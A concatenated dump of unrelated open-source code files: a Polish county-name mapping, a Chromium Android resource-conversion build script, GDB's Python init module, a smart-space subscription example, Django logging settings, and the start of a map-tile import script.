    ('glubczycki', u'głubczycki'),  # fixed: was u'głubczyski'
    ('kedzierzynsko-kozielski', u'kędzierzyńsko-kozielski'),  # fixed: was u'kędzierzyński-kozielski'
    ('kluczborski', u'kluczborski'),
    ('krapkowicki', u'krapkowicki'),
    ('namyslowski', u'namysłowski'),
    ('nyski', u'nyski'),
    ('oleski', u'oleski'),
    ('opolski', u'opolski'),
    ('prudnicki', u'prudnicki'),
    ('strzelecki', u'strzelecki'),
    ('rzeszow', u'Rzeszów'),
    ('krosno', u'Krosno'),
    ('przemysl', u'Przemyśl'),
    ('tarnobrzeg', u'Tarnobrzeg'),
    ('bieszczadzki', u'bieszczadzki'),
    ('brzozowski', u'brzozowski'),
    ('debicki', u'dębicki'),
    ('jaroslawski', u'jarosławski'),
    ('jasielski', u'jasielski'),
    ('kolbuszowski', u'kolbuszowski'),
    ('krosnienski', u'krośnieński'),
    ('leski', u'leski'),
    ('lezajski', u'leżajski'),
    ('lubaczowski', u'lubaczowski'),
    ('lancucki', u'łańcucki'),
    ('mielecki', u'mielecki'),
    ('nizanski', u'niżański'),
    ('przemyski', u'przemyski'),
    ('przeworski', u'przeworski'),
    ('ropczycko-sedziszowski', u'ropczycko-sędziszowski'),
    ('rzeszowski', u'rzeszowski'),
    ('sanocki', u'sanocki'),
    ('stalowowolski', u'stalowowolski'),
    ('strzyzowski', u'strzyżowski'),
    ('tarnobrzeski', u'tarnobrzeski'),
    ('bialystok', u'Białystok'),
    ('lomza', u'Łomża'),
    ('suwalki', u'Suwałki'),
    ('augustowski', u'augustowski'),
    ('bialostocki', u'białostocki'),
    ('bielski', u'bielski'),
    ('grajewski', u'grajewski'),
    ('hajnowski', u'hajnowski'),
    ('kolnenski', u'kolneński'),
    # NOTE(review): key contains a non-ASCII character, unlike every other
    # slug. Left unchanged because it is the stored value.
    ('łomzynski', u'łomżyński'),
    ('moniecki', u'moniecki'),
    ('sejnenski', u'sejneński'),
    ('siemiatycki', u'siemiatycki'),  # fixed: was u'siematycki' (Siemiatycze county)
    ('sokolski', u'sokólski'),
    ('suwalski', u'suwalski'),
    ('wysokomazowiecki', u'wysokomazowiecki'),
    ('zambrowski', u'zambrowski'),
    ('gdansk', u'Gdańsk'),
    ('gdynia', u'Gdynia'),
    ('slupsk', u'Słupsk'),
    ('sopot', u'Sopot'),
    ('bytowski', u'bytowski'),
    ('chojnicki', u'chojnicki'),
    ('czluchowski', u'człuchowski'),
    ('kartuski', u'kartuski'),
    ('koscierski', u'kościerski'),
    ('kwidzynski', u'kwidzyński'),
    ('leborski', u'lęborski'),
    ('malborski', u'malborski'),
    ('nowodworski', u'nowodworski'),
    ('gdanski', u'gdański'),
    ('pucki', u'pucki'),
    ('slupski', u'słupski'),
    ('starogardzki', u'starogardzki'),
    ('sztumski', u'sztumski'),
    ('tczewski', u'tczewski'),
    ('wejherowski', u'wejherowski'),  # fixed: was u'wejcherowski' (Wejherowo county)
    ('katowice', u'Katowice'),
    ('bielsko-biala', u'Bielsko-Biała'),
    ('bytom', u'Bytom'),
    ('chorzow', u'Chorzów'),
    ('czestochowa', u'Częstochowa'),
    ('dabrowa-gornicza', u'Dąbrowa Górnicza'),
    ('gliwice', u'Gliwice'),
    ('jastrzebie-zdroj', u'Jastrzębie Zdrój'),
    ('jaworzno', u'Jaworzno'),
    ('myslowice', u'Mysłowice'),
    ('piekary-slaskie', u'Piekary Śląskie'),
    ('ruda-slaska', u'Ruda Śląska'),
    ('rybnik', u'Rybnik'),
    ('siemianowice-slaskie', u'Siemianowice Śląskie'),
    ('sosnowiec', u'Sosnowiec'),
    ('swietochlowice', u'Świętochłowice'),
    ('tychy', u'Tychy'),
    ('zabrze', u'Zabrze'),
    ('zory', u'Żory'),
    ('bedzinski', u'będziński'),
    ('bielski', u'bielski'),
    ('bierunsko-ledzinski', u'bieruńsko-lędziński'),
    ('cieszynski', u'cieszyński'),
    ('czestochowski', u'częstochowski'),
    ('gliwicki', u'gliwicki'),
    ('klobucki', u'kłobucki'),
    ('lubliniecki', u'lubliniecki'),
    ('mikolowski', u'mikołowski'),
    ('myszkowski', u'myszkowski'),
    ('pszczynski', u'pszczyński'),
    ('raciborski', u'raciborski'),
    ('rybnicki', u'rybnicki'),
    ('tarnogorski', u'tarnogórski'),
    ('wodzislawski', u'wodzisławski'),
    ('zawiercianski', u'zawierciański'),
    ('zywiecki', u'żywiecki'),
    ('kielce', u'Kielce'),
    ('buski', u'buski'),
    ('jedrzejowski', u'jędrzejowski'),
    ('kazimierski', u'kazimierski'),
    ('kielecki', u'kielecki'),
    ('konecki', u'konecki'),
    ('opatowski', u'opatowski'),
    ('ostrowiecki', u'ostrowiecki'),
    ('pinczowski', u'pińczowski'),
    ('sandomierski', u'sandomierski'),
    ('skarzyski', u'skarżyski'),
    ('starachowicki', u'starachowicki'),
    ('staszowski', u'staszowski'),
    ('wloszczowski', u'włoszczowski'),
    ('olsztyn', u'Olsztyn'),
    ('elblag', u'Elbląg'),
    ('bartoszycki', u'bartoszycki'),
    ('braniewski', u'braniewski'),
    ('dzialdowski', u'działdowski'),
    ('elblaski', u'elbląski'),
    ('elcki', u'ełcki'),
    ('gizycki', u'giżycki'),
    ('goldapski', u'gołdapski'),
    ('ilawski', u'iławski'),
    ('ketrzynski', u'kętrzyński'),
    ('lidzbarski', u'lidzbarski'),
    ('mragowski', u'mrągowski'),
    ('nidzicki', u'nidzicki'),
    ('nowomiejski', u'nowomiejski'),
    ('olecki', u'olecki'),
    ('olsztynski', u'olsztyński'),
    ('ostrodzki', u'ostródzki'),
    ('piski', u'piski'),
    ('szczycienski', u'szczycieński'),
    ('wegorzewski', u'węgorzewski'),
    ('poznan', u'Poznań'),
    ('kalisz', u'Kalisz'),
    ('konin', u'Konin'),
    ('leszno', u'Leszno'),
    ('chodzieski', u'chodzieski'),  # fixed: was u'chodziejski' (Chodzież county)
    ('czarnkowsko-trzcianecki', u'czarnkowsko-trzcianecki'),
    ('gnieznienski', u'gnieźnieński'),
    ('gostynski', u'gostyński'),
    ('grodziski', u'grodziski'),
    ('jarocinski', u'jarociński'),
    ('kaliski', u'kaliski'),
    ('kepinski', u'kępiński'),
    ('kolski', u'kolski'),
    ('koninski', u'koniński'),
    ('koscianski', u'kościański'),
    ('krotoszynski', u'krotoszyński'),
    ('leszczynski', u'leszczyński'),
    ('miedzychodzki', u'międzychodzki'),
    ('nowotomyski', u'nowotomyski'),
    ('obornicki', u'obornicki'),
    ('ostrowski', u'ostrowski'),
    ('ostrzeszowski', u'ostrzeszowski'),
    ('pilski', u'pilski'),
    ('pleszewski', u'pleszewski'),
    ('poznanski', u'poznański'),
    ('rawicki', u'rawicki'),
    ('slupecki', u'słupecki'),
    ('szamotulski', u'szamotulski'),
    ('sredzki', u'średzki'),
    ('sremski', u'śremski'),
    ('turecki', u'turecki'),
    ('wagrowiecki', u'wągrowiecki'),
    ('wolsztynski', u'wolsztyński'),
    ('wrzesinski', u'wrzesiński'),
    ('zlotowski', u'złotowski'),
    ('bialogardzki', u'białogardzki'),
    ('choszczenski', u'choszczeński'),
    ('drawski', u'drawski'),
    ('goleniowski', u'goleniowski'),
    ('gryficki', u'gryficki'),
    ('gryfinski', u'gryfiński'),
    ('kamienski', u'kamieński'),
    ('kolobrzeski', u'kołobrzeski'),
    ('koszalinski', u'koszaliński'),
    ('lobeski', u'łobeski'),
    ('mysliborski', u'myśliborski'),
    ('policki', u'policki'),
    ('pyrzycki', u'pyrzycki'),
    ('slawienski', u'sławieński'),
    ('stargardzki', u'stargardzki'),
    ('szczecinecki', u'szczecinecki'),
    ('swidwinski', u'świdwiński'),
    ('walecki', u'wałecki'),
)
| apache-2.0 |
boundarydevices/android_external_chromium_org | build/android/gyp/generate_v14_compatible_resources.py | 14 | 13731 | #!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Convert Android xml resources to API 14 compatible.
There are two reasons that we cannot just use API 17 attributes,
so we are generating another set of resources by this script.
1. paddingStart attribute can cause a crash on Galaxy Tab 2.
2. There is a bug that paddingStart does not override paddingLeft on
JB-MR1. This is fixed on JB-MR2.
Therefore, this resource generation script can be removed when
we drop the support for JB-MR1.
Please refer to http://crbug.com/235118 for the details.
"""
import optparse
import os
import re
import shutil
import sys
import xml.dom.minidom as minidom
from util import build_utils
# Note that we are assuming 'android:' is an alias of
# the namespace 'http://schemas.android.com/apk/res/android'.
# Gravity attributes are checked (see AssertNotDeprecatedAttribute) rather
# than rewritten, since their start/end values are handled elsewhere.
GRAVITY_ATTRIBUTES = ('android:gravity', 'android:layout_gravity')
# Almost all the attributes that has "Start" or "End" in
# its name should be mapped.
ATTRIBUTES_TO_MAP = {'paddingStart' : 'paddingLeft',
                     'drawableStart' : 'drawableLeft',
                     'layout_alignStart' : 'layout_alignLeft',
                     'layout_marginStart' : 'layout_marginLeft',
                     'layout_alignParentStart' : 'layout_alignParentLeft',
                     'layout_toStartOf' : 'layout_toLeftOf',
                     'paddingEnd' : 'paddingRight',
                     'drawableEnd' : 'drawableRight',
                     'layout_alignEnd' : 'layout_alignRight',
                     'layout_marginEnd' : 'layout_marginRight',
                     'layout_alignParentEnd' : 'layout_alignParentRight',
                     'layout_toEndOf' : 'layout_toRightOf'}
# Rebind with the 'android:' prefix on keys and values, matching how the
# attributes actually appear in resource XML.
ATTRIBUTES_TO_MAP = dict(['android:' + k, 'android:' + v] for k, v
                         in ATTRIBUTES_TO_MAP.iteritems())
# Reverse map (left/right -> start/end) used to flag deprecated attributes.
ATTRIBUTES_TO_MAP_REVERSED = dict([v, k] for k, v
                                  in ATTRIBUTES_TO_MAP.iteritems())
def IterateXmlElements(node):
  """Yield every element node in the tree rooted at |node|, pre-order DFS."""
  pending = [node]
  while pending:
    current = pending.pop()
    if current.nodeType == current.ELEMENT_NODE:
      yield current
    # Push children reversed so the leftmost child is visited first,
    # preserving pre-order depth-first traversal.
    pending.extend(reversed(current.childNodes))
def AssertNotDeprecatedAttribute(name, value, filename):
  """Raise an Exception if |name|/|value| uses a deprecated left/right form."""
  problem = None
  if name in ATTRIBUTES_TO_MAP_REVERSED:
    # A left/right attribute that has a start/end replacement.
    problem = '{0} should use {1} instead of {2}'.format(
        filename, ATTRIBUTES_TO_MAP_REVERSED[name], name)
  elif name in GRAVITY_ATTRIBUTES and ('left' in value or 'right' in value):
    # Gravity attributes keep their name but must use start/end values.
    problem = '{0} should use start/end instead of left/right for {1}'.format(
        filename, name)
  if not problem:
    return
  problem += ('\nFor background, see: http://android-developers.blogspot.com/'
              '2013/03/native-rtl-support-in-android-42.html\n'
              'If you have a legitimate need for this attribute, discuss with '
              'kkimlabs@chromium.org or newt@chromium.org')
  raise Exception(problem)
def WriteDomToFile(dom, filename):
  """Serialize *dom* as XML into *filename*, creating parent dirs first."""
  build_utils.MakeDirectory(os.path.dirname(filename))
  output = open(filename, 'w')
  try:
    dom.writexml(output, '', ' ', '\n', encoding='utf-8')
  finally:
    output.close()
def HasStyleResource(dom):
  """Return True if the dom is a style resource, False otherwise."""
  # Use the next() builtin rather than the Python-2-only .next() method so
  # this also works under Python 3.  The first element of a well-formed
  # resource file is its root element.
  root_node = next(IterateXmlElements(dom))
  return bool(root_node.nodeName == 'resources' and
              list(root_node.getElementsByTagName('style')))
def ErrorIfStyleResourceExistsInDir(input_dir):
  """If a style resource is in input_dir, raises an exception."""
  for xml_path in build_utils.FindInDirectory(input_dir, '*.xml'):
    if HasStyleResource(minidom.parse(xml_path)):
      raise Exception('error: style file ' + xml_path +
                      ' should be under ' + input_dir +
                      '-v17 directory. Please refer to '
                      'http://crbug.com/243952 for the details.')
def GenerateV14LayoutResourceDom(dom, filename, assert_not_deprecated=True):
  """Convert layout resource to API 14 compatible layout resource.

  Args:
    dom: Parsed minidom object to be modified.
    filename: Filename that the DOM was parsed from.
    assert_not_deprecated: Whether deprecated attributes (e.g. paddingLeft)
      will cause an exception to be thrown.

  Returns:
    True if dom is modified, False otherwise.
  """
  modified = False
  # Walk every element and rewrite any API 17 Start/End attribute into its
  # Left/Right equivalent, e.g. paddingStart="10dp" -> paddingLeft="10dp".
  # Gravity attributes are skipped because their start/end *values* are
  # backward-compatible; explained at
  # https://plus.sandbox.google.com/+RomanNurik/posts/huuJd8iVVXY?e=Showroom
  for element in IterateXmlElements(dom):
    for attr_name, attr_value in list(element.attributes.items()):
      mapped_name = ATTRIBUTES_TO_MAP.get(attr_name)
      if mapped_name is not None:
        element.setAttribute(mapped_name, attr_value)
        del element.attributes[attr_name]
        modified = True
      elif assert_not_deprecated:
        AssertNotDeprecatedAttribute(attr_name, attr_value, filename)
  return modified
def GenerateV14StyleResourceDom(dom, filename, assert_not_deprecated=True):
  """Convert style resource to API 14 compatible style resource.

  Args:
    dom: Parsed minidom object to be modified.
    filename: Filename that the DOM was parsed from.
    assert_not_deprecated: Whether deprecated attributes (e.g. paddingLeft) will
      cause an exception to be thrown.

  Returns:
    True if dom is modified, False otherwise.
  """
  is_modified = False
  for style_element in dom.getElementsByTagName('style'):
    for item_element in style_element.getElementsByTagName('item'):
      name = item_element.attributes['name'].value
      # Guard against an empty <item/>, which has no text child; previously
      # childNodes[0] raised IndexError.  Treat its value as ''.
      value = (item_element.childNodes[0].nodeValue
               if item_element.childNodes else '')
      if name in ATTRIBUTES_TO_MAP:
        item_element.attributes['name'].value = ATTRIBUTES_TO_MAP[name]
        is_modified = True
      elif assert_not_deprecated:
        AssertNotDeprecatedAttribute(name, value, filename)
  return is_modified
def GenerateV14LayoutResource(input_filename, output_v14_filename,
                              output_v17_filename):
  """Convert API 17 layout resource to API 14 compatible layout resource.

  It's mostly a simple replacement, s/Start/Left s/End/Right,
  on the attribute names.
  If the generated resource is identical to the original resource,
  don't do anything. If not, write the generated resource to
  output_v14_filename, and copy the original resource to output_v17_filename.
  """
  dom = minidom.parse(input_filename)
  if not GenerateV14LayoutResourceDom(dom, input_filename):
    # Nothing was converted; no v14 variant is needed.
    return
  # Write the converted resource, then preserve the original under -v17.
  WriteDomToFile(dom, output_v14_filename)
  build_utils.MakeDirectory(os.path.dirname(output_v17_filename))
  shutil.copy2(input_filename, output_v17_filename)
def GenerateV14StyleResource(input_filename, output_v14_filename):
  """Convert API 17 style resources to API 14 compatible style resource.

  Write the generated style resource to output_v14_filename.
  It's mostly a simple replacement, s/Start/Left s/End/Right,
  on the attribute names.
  """
  parsed = minidom.parse(input_filename)
  GenerateV14StyleResourceDom(parsed, input_filename)
  # Always write the result, whether or not anything was converted.
  WriteDomToFile(parsed, output_v14_filename)
def GenerateV14LayoutResourcesInDir(input_dir, output_v14_dir, output_v17_dir):
  """Convert layout resources to API 14 compatible resources in input_dir."""
  for xml_path in build_utils.FindInDirectory(input_dir, '*.xml'):
    relative = os.path.relpath(xml_path, input_dir)
    GenerateV14LayoutResource(xml_path,
                              os.path.join(output_v14_dir, relative),
                              os.path.join(output_v17_dir, relative))
def GenerateV14StyleResourcesInDir(input_dir, output_v14_dir):
  """Convert style resources to API 14 compatible resources in input_dir."""
  for xml_path in build_utils.FindInDirectory(input_dir, '*.xml'):
    relative = os.path.relpath(xml_path, input_dir)
    GenerateV14StyleResource(xml_path, os.path.join(output_v14_dir, relative))
def VerifyV14ResourcesInDir(input_dir, resource_type):
"""Verify that the resources in input_dir is compatible with v14, i.e., they
don't use attributes that cause crashes on certain devices. Print an error if
they have."""
for input_filename in build_utils.FindInDirectory(input_dir, '*.xml'):
warning_message = ('warning : ' + input_filename + ' has an RTL attribute, '
'i.e., attribute that has "start" or "end" in its name.'
' Pre-v17 resources should not include it because it '
'can cause crashes on certain devices. Please refer to '
'http://crbug.com/243952 for the details.')
dom = minidom.parse(input_filename)
if resource_type in ('layout', 'xml'):
if GenerateV14LayoutResourceDom(dom, input_filename, False):
print warning_message
elif resource_type == 'values':
if GenerateV14StyleResourceDom(dom, input_filename, False):
print warning_message
def AssertNoDeprecatedAttributesInDir(input_dir, resource_type):
  """Raises an exception if resources in input_dir have deprecated attributes,
  e.g., paddingLeft, paddingRight"""
  # Map each handled resource type to the checker that raises on deprecated
  # attributes (assert_not_deprecated defaults to True in both).
  checkers = {'layout': GenerateV14LayoutResourceDom,
              'xml': GenerateV14LayoutResourceDom,
              'values': GenerateV14StyleResourceDom}
  checker = checkers.get(resource_type)
  if checker is None:
    return
  for xml_path in build_utils.FindInDirectory(input_dir, '*.xml'):
    checker(minidom.parse(xml_path), xml_path)
def ParseArgs():
  """Parses command line options.

  Returns:
    An options object as from optparse.OptionsParser.parse_args()
  """
  parser = optparse.OptionParser()
  parser.add_option('--res-dir',
                    help='directory containing resources '
                         'used to generate v14 compatible resources')
  parser.add_option('--res-v14-compatibility-dir',
                    help='output directory into which '
                         'v14 compatible resources will be generated')
  parser.add_option('--stamp', help='File to touch on success')
  parser.add_option('--verify-only', action="store_true", help='Do not generate'
      ' v14 resources. Instead, just verify that the resources are already '
      "compatible with v14, i.e. they don't use attributes that cause crashes "
      'on certain devices.')
  options, args = parser.parse_args()
  if args:
    parser.error('No positional arguments should be given.')
  # Check that required options have been provided.
  build_utils.CheckOptions(options, parser,
                           required=('res_dir', 'res_v14_compatibility_dir'))
  return options
def GenerateV14Resources(res_dir, res_v14_dir, verify_only):
  # Walk each resource subdirectory (e.g. 'layout', 'values-v17') and either
  # verify it or generate v14-compatible variants under res_v14_dir.
  for name in os.listdir(res_dir):
    if not os.path.isdir(os.path.join(res_dir, name)):
      continue
    # A resource dir name is '<type>[-<qualifier>...]', e.g. 'values-en-v17'.
    dir_pieces = name.split('-')
    resource_type = dir_pieces[0]
    qualifiers = dir_pieces[1:]
    # Locate the API-level qualifier ('v17' etc.), if present.
    api_level_qualifier_index = -1
    api_level_qualifier = ''
    for index, qualifier in enumerate(qualifiers):
      if re.match('v[0-9]+$', qualifier):
        api_level_qualifier_index = index
        api_level_qualifier = qualifier
        break
    # Android pre-v17 API doesn't support RTL. Skip.
    if 'ldrtl' in qualifiers:
      continue
    input_dir = os.path.abspath(os.path.join(res_dir, name))
    if verify_only:
      # Resources that apply pre-v17 must not contain RTL attributes at all;
      # v17+ resources must at least avoid the deprecated Left/Right forms.
      if not api_level_qualifier or int(api_level_qualifier[1:]) < 17:
        VerifyV14ResourcesInDir(input_dir, resource_type)
      else:
        AssertNoDeprecatedAttributesInDir(input_dir, resource_type)
    else:
      # We also need to copy the original v17 resource to *-v17 directory
      # because the generated v14 resource will hide the original resource.
      output_v14_dir = os.path.join(res_v14_dir, name)
      output_v17_dir = os.path.join(res_v14_dir, name + '-v17')
      # We only convert layout resources under layout*/, xml*/,
      # and style resources under values*/.
      if resource_type in ('layout', 'xml'):
        if not api_level_qualifier:
          GenerateV14LayoutResourcesInDir(input_dir, output_v14_dir,
                                          output_v17_dir)
      elif resource_type == 'values':
        if api_level_qualifier == 'v17':
          # Strip the v17 qualifier so the generated copy applies pre-v17.
          output_qualifiers = qualifiers[:]
          del output_qualifiers[api_level_qualifier_index]
          output_v14_dir = os.path.join(res_v14_dir,
                                        '-'.join([resource_type] +
                                                 output_qualifiers))
          GenerateV14StyleResourcesInDir(input_dir, output_v14_dir)
        elif not api_level_qualifier:
          # Unqualified values*/ dirs must not contain style resources.
          ErrorIfStyleResourceExistsInDir(input_dir)
def main():
  # Regenerate the v14-compatibility output directory from scratch, then
  # touch the stamp file (if requested) to mark success for the build system.
  options = ParseArgs()
  res_v14_dir = options.res_v14_compatibility_dir
  build_utils.DeleteDirectory(res_v14_dir)
  build_utils.MakeDirectory(res_v14_dir)
  GenerateV14Resources(options.res_dir, res_v14_dir, options.verify_only)
  if options.stamp:
    build_utils.Touch(options.stamp)

if __name__ == '__main__':
  sys.exit(main())
| bsd-3-clause |
UBERTC/binutils | gdb/python/lib/gdb/__init__.py | 26 | 4609 | # Copyright (C) 2010-2016 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import traceback
import os
import sys
import _gdb
# Make reload() available under both major Python versions: Python 3 removed
# the builtin, so pull it from imp there.
if sys.version_info[0] > 2:
    # Python 3 moved "reload"
    from imp import reload

from _gdb import *
class _GdbFile (object):
    """Minimal file-like base class for the streams installed below.

    Subclasses supply write(); this class fills in the rest of the file
    protocol with no-op or delegating implementations.
    """

    # These two are needed in Python 3
    encoding = "UTF-8"
    errors = "strict"

    def isatty(self):
        return False

    def close(self):
        # Nothing to release here.
        return None

    def flush(self):
        # Delegate to the module-level flush() (from the _gdb import above).
        flush()

    def writelines(self, iterable):
        for item in iterable:
            self.write(item)
class GdbOutputFile (_GdbFile):
    # write()/STDOUT come from the `from _gdb import *` above, routing output
    # through GDB's own stream handling.
    def write(self, s):
        write(s, stream=STDOUT)

# Replace the interpreter's stdout so Python print output goes through GDB.
sys.stdout = GdbOutputFile()

class GdbOutputErrorFile (_GdbFile):
    # Same as GdbOutputFile but targeting GDB's error stream.
    def write(self, s):
        write(s, stream=STDERR)

# Replace the interpreter's stderr likewise.
sys.stderr = GdbOutputErrorFile()
# Module-level registries consulted by GDB; user scripts append to these.

# Default prompt hook does nothing.
prompt_hook = None
# Ensure that sys.argv is set to something.
# We do not use PySys_SetArgvEx because it did not appear until 2.6.6.
sys.argv = ['']
# Initial pretty printers.
pretty_printers = []
# Initial type printers.
type_printers = []
# Initial xmethod matchers.
xmethods = []
# Initial frame filters.
frame_filters = {}
# Initial frame unwinders.
frame_unwinders = []
def execute_unwinders(pending_frame):
    """Internal function called from GDB to execute all unwinders.

    Runs each currently enabled unwinder until it finds the one that
    can unwind given frame.

    Arguments:
        pending_frame: gdb.PendingFrame instance.

    Returns:
        gdb.UnwindInfo instance or None.
    """
    def _candidate_unwinders():
        # Search order: every objfile's unwinders first, then the current
        # progspace's, then the globally registered ones.  Being a generator,
        # current_progspace() is only queried after the objfile loop finishes,
        # matching the original evaluation order.
        for objfile in _gdb.objfiles():
            for unwinder in objfile.frame_unwinders:
                yield unwinder
        for unwinder in _gdb.current_progspace().frame_unwinders:
            yield unwinder
        for unwinder in frame_unwinders:
            yield unwinder

    for unwinder in _candidate_unwinders():
        if not unwinder.enabled:
            continue
        unwind_info = unwinder(pending_frame)
        if unwind_info is not None:
            return unwind_info
    return None
# Convenience variable to GDB's python directory
PYTHONDIR = os.path.dirname(os.path.dirname(__file__))

# Auto-load all functions/commands.

# Packages to auto-load: the gdb/ sub-packages whose modules are imported
# automatically at startup.
packages = [
    'function',
    'command',
    'printer'
]
# pkgutil.iter_modules is not available prior to Python 2.6.  Instead,
# manually iterate the list, collating the Python files in each module
# path.  Construct the module name, and import.

def auto_load_packages():
    """Import (or reload) every module found under the `packages` dirs.

    Scans each directory listed in `packages` below this module's own
    directory, importing every *.py file except __init__.py.  A failure in
    one module is reported on stderr but does not stop the rest from
    loading.
    """
    for package in packages:
        location = os.path.join(os.path.dirname(__file__), package)
        if not os.path.exists(location):
            continue
        py_files = filter(lambda x: x.endswith('.py')
                                    and x != '__init__.py',
                          os.listdir(location))
        for py_file in py_files:
            # Construct from foo.py, gdb.module.foo
            modname = "%s.%s.%s" % (__name__, package, py_file[:-3])
            try:
                if modname in sys.modules:
                    # reload modules with duplicate names
                    reload(__import__(modname))
                else:
                    __import__(modname)
            except Exception:
                # Catch Exception rather than a bare except so that
                # KeyboardInterrupt and SystemExit still propagate; anything
                # else is reported without aborting the remaining imports.
                sys.stderr.write(traceback.format_exc() + "\n")

auto_load_packages()
def GdbSetPythonDirectory(dir):
    """Update sys.path, reload gdb and auto-load packages."""
    global PYTHONDIR
    # Drop the previous directory from the search path, if it is there.
    if PYTHONDIR in sys.path:
        sys.path.remove(PYTHONDIR)
    sys.path.insert(0, dir)
    PYTHONDIR = dir
    # note that reload overwrites the gdb module without deleting existing
    # attributes
    reload(__import__(__name__))
    auto_load_packages()
| gpl-2.0 |
desmovalvo/virtualsib-part2 | tools/explo2/SS_HelloWorld_reactiveNode.py | 5 | 1712 | import Node
import time
import sys
# Create a node instance
# Programmer can give any name
# The infrastructure will assign unique names ???
node = Node.ParticipantNode("HelloWorld reactive")

# Discover Smart Spaces around you
# Use the technologies used at the "vertical business domain"
# E.g. mDNS, UPnP, UDDI, Bluetooth SDP
# Connect to the selected smart space
# In this simple example we use localhost
#ss_handle = ("X", (Node.TCPConnector, ("127.0.0.1", 10011)))
ss_handle = node.discover()
print ss_handle
if not node.join(ss_handle):
    # Cannot continue without a smart space membership.
    sys.exit('Could not join to Smart Space')
print "--- Member of SS:", node.member_of
# end connect
# Class structure to be called as subscription fires
class MsgHandler:
    """Subscription callback: prints the reported triples and shuts the
    session down once the subscribed triple appears."""
    def __init__(self):
        # Accumulates every triple reported by the subscription so far.
        self.results = []
    def handle(self, added, removed):
        # NOTE(review): relies on the module-level globals `node`, `rs` and
        # `ss_handle`; `rs` is only bound *after* this class is defined, so
        # this must not fire before the subscribe call below completes.
        print "Newly created:", added
        self.results.extend(added)
        for i in self.results:
            print "State of the space:", str(i)
            print str(i[0][2])
        print "HelloWorld"
        node.CloseSubscribeTransaction(rs)
        print "Closing reactive session"
        node.leave(ss_handle)
        # Terminate the whole script once the event has been handled.
        sys.exit()
# Create a reactive-state (reactive) session with the
# smart space
rs = node.CreateSubscribeTransaction(ss_handle)
# Subscribe to the ('God', 'hasCreated', 'World') triple; MsgHandler.handle
# fires on later insertions, while `result` holds any already-present matches.
result = rs.subscribe_rdf([(('God', 'hasCreated', 'World'),'literal')], MsgHandler())
if result != []:
    # The triple already exists: report, unsubscribe and leave.
    print "It seem The God has already done his job thus..."
    print "HelloWorld"
    node.CloseSubscribeTransaction(rs)
    print "Unsubscribed"
    node.leave(ss_handle)
# Block until the user gives up waiting (the subscription callback may
# terminate the process first), then tear the session down.
inp = raw_input("Press any key if you are bored to wait\n")
node.CloseSubscribeTransaction(rs)
print "Unsubscribed"
node.leave(ss_handle)
sys.exit()
| lgpl-3.0 |
livingbio/weather-parser | src/weather/settings/local.py | 2 | 1978 | from .base import * # NOQA
import sys
import logging.config
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Turn off debug while imported by Celery with a workaround
# See http://stackoverflow.com/a/4806384
if "celery" in sys.argv[0]:
    DEBUG = False

# Django Debug Toolbar
INSTALLED_APPS += (
    'debug_toolbar.apps.DebugToolbarConfig',)

# Show emails to console in DEBUG mode
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'

# Log everything to the logs directory at the top
# (join/dirname/BASE_DIR presumably come from the `.base` wildcard import.)
LOGFILE_ROOT = join(dirname(BASE_DIR), 'logs')

# Reset logging
# (see http://www.caktusgroup.com/blog/2015/01/27/Django-Logging-Configuration-logging_config-default-settings-logger/)
LOGGING_CONFIG = None
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    # 'verbose' (timestamp + source location) is used for log files,
    # 'simple' for console output.
    'formatters': {
        'verbose': {
            'format': "[%(asctime)s] %(levelname)s [%(pathname)s:%(lineno)s] %(message)s",
            'datefmt': "%d/%b/%Y %H:%M:%S"
        },
        'simple': {
            'format': '%(levelname)s %(message)s'
        },
    },
    'handlers': {
        'django_log_file': {
            'level': 'DEBUG',
            'class': 'logging.FileHandler',
            'filename': join(LOGFILE_ROOT, 'django.log'),
            'formatter': 'verbose'
        },
        'proj_log_file': {
            'level': 'DEBUG',
            'class': 'logging.FileHandler',
            'filename': join(LOGFILE_ROOT, 'project.log'),
            'formatter': 'verbose'
        },
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'simple'
        }
    },
    'loggers': {
        # Django's own messages go to django.log.
        'django': {
            'handlers': ['django_log_file'],
            'propagate': True,
            'level': 'DEBUG',
        },
        # Application code logging under the 'project' name goes to project.log.
        'project': {
            'handlers': ['proj_log_file'],
            'level': 'DEBUG',
        },
    }
}

# Apply the dict config immediately, since LOGGING_CONFIG=None disables
# Django's own automatic configuration.
logging.config.dictConfig(LOGGING)
| mit |
nkiraly/koadstation | tiledraweru14/provisioning/roles/maptile-import-tools/files/populate.py | 1 | 16836 | #!/usr/bin/env python
from os import chdir, remove
from sys import stderr, stdout
from optparse import OptionParser
from subprocess import Popen, PIPE
from xml.etree.ElementTree import parse, SubElement
from os.path import dirname, basename, splitext, join
from urlparse import urlparse, urljoin
from tempfile import mkstemp
from StringIO import StringIO
from zipfile import ZipFile
from urllib import urlopen
from time import strftime
import sys, traceback
import json
import cascadenik
import mapnik
# Proj.4 definition string for spherical/web mercator (named after EPSG:3857).
epsg3857 = '+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null'

parser = OptionParser(usage="""%prog [options] [url...]""")

# Default style URL and bounding box (south, west, north, east).
defaults = dict(style='https://raw.github.com/nkiraly/OSM-Solar/tiledrawer/tiledrawer.cfg',
                bbox=(37.777, -122.352, 37.839, -122.226))

parser.set_defaults(**defaults)

parser.add_option('-s', '--style', dest='style',
                  help='URL of a style description, default %(style)s.' % defaults)

parser.add_option('-b', '--bbox', dest='bbox',
                  help='Bounding box in floating point geographic coordinates: south west north east.',
                  type='float', nargs=4)
def download_file(url):
    """ Shell out to curl to download extract and return its local filename.
    """
    scheme, host, path, params, query, fragment = urlparse(url)
    base, ext = splitext(basename(path))
    # Download into a uniquely named file under progress/, keeping the
    # original base name and extension for readability.
